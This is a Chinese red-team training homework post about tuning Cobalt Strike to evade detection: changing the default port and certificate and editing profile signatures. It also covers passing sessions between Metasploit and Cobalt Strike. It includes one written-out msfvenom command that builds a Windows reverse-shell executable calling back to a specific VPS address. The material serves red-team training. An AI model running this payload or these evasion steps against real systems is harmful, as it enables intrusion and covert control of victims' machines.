文章来源|MS08067 红队培训班第14节课作业
本文作者:某学员A(红队培训班2期学员)
1.修改Cobalt Strike默认监听端口:
2.修改Cobalt Strike默认数字证书:
(默认)
(新生成)
3.修改Cobalt Strike中jQuery.profile文件里的部分敏感特征信息
对Cobalt Strike的jQuery.profile配置文件中的如下信息进行相应修改:
修改后通过命令“c2lint jquery.profile”检查是否正确可用:
于是根据反馈信息再进一步修改后,再进行检查:
4.msf转cs
通过msf的命令“msfvenom -p windows/meterpreter/reverse_tcp LHOST=8.129.211.1 LPORT=12345 -f exe -o test.exe”生成反弹shell,靶机执行该反弹shell后反弹至VPS的msf上:
将VPS的msf派生到cs,完成从 靶机->VPS_msf:12345->VPS_cs:4444:
5.cs转msf
通过cs生成反弹shell:
靶机执行该反弹shell后反弹至VPS的cs上:
用msf监听4444端口:
右键点击反弹会话->spawn,派生到msf监听的4444端口,但msf未接收到数据,应该是本机上的cs4.0出了问题:
本文分享自 Ms08067安全实验室 微信公众号,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文参与 腾讯云自媒体同步曝光计划 ,欢迎热爱写作的你一起参与!